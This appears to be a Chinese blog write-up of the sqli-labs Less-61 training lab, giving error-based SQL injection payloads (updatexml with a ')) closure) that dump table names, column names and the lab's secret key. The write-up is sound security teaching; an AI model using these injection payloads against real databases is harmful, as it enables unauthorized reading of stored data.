sqli-labs-Less-61

SQLI-LAPS 实验记录

Less-61

这一关与上一关类似,只是闭合方式不同,为单引号加双括号的方式,依然采用报错注入的方式通关。

根据之前的经验,我们在命令行中采用单引号加双括号来闭合,使用报错注入命令:

sql 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) --+

结果如图所示,能够爆出表名SU367R5TLR。

接下来,我们继续使用该语句来进行注入,爆出数列名以及秘钥,语句如下:

  • 查询列名
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='SU367R5TLR'),0x7e),1)--+

查询结果为secret_CH6P。

  • 查询秘钥
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(secret_CH6P) from challenges.SU367R5TLR),0x7e),1) --+

查询如图所示,秘钥为RGPHim48wGuZe9NvjtVXnQ2f。
之后,将查询出的密钥输入页面下方的对话框中,就可以看到成功信息了。

相关推荐
Lyyaoo.6 小时前
Spring Boot Validation 声明式参数校验
spring boot·后端·mysql
oradh7 小时前
Oracle闪回技术操作总结
数据库·oracle·oracle闪回技术操作总结·oracle闪回·flashback技术
网安蟹佬霸8 小时前
OSINT开源情报收集实战:从信息搜集到资产测绘(2026最新万字保姆级指南)
前端·网络·安全·web安全·网络安全·开源
南城以南溫暖如初1478 小时前
外卖CPS实战指南:从技术选型到运营落地全流程解析
java·spring boot·mysql·架构·vue
ltl8 小时前
RocksDB 并发 Compaction 与 Rate Limiter
数据库
游戏开发爱好者89 小时前
WebSocket 抓包怎么查看内容?从握手到消息帧完整解读
网络协议·计算机网络·网络安全·ios·adb·https·udp
闻道且行之10 小时前
图片处理助手|泊松融合原理 + C++ 工程实现,seamlessClone 三模式一次讲透
数据库·c++·人工智能·opencv
夏炳辉.10 小时前
PostgreSQL 高可用集群核心配置参数全解:从原生流复制到 Patroni 企业级方案
数据库·postgresql
努力的小雨11 小时前
KES 开启 SSL 前,证书、端口和客户端要一起验
数据库
DevOps老兵11 小时前
AI全栈知识07:向量数据库 - Milvus/Chroma实战
数据库·ai·milvus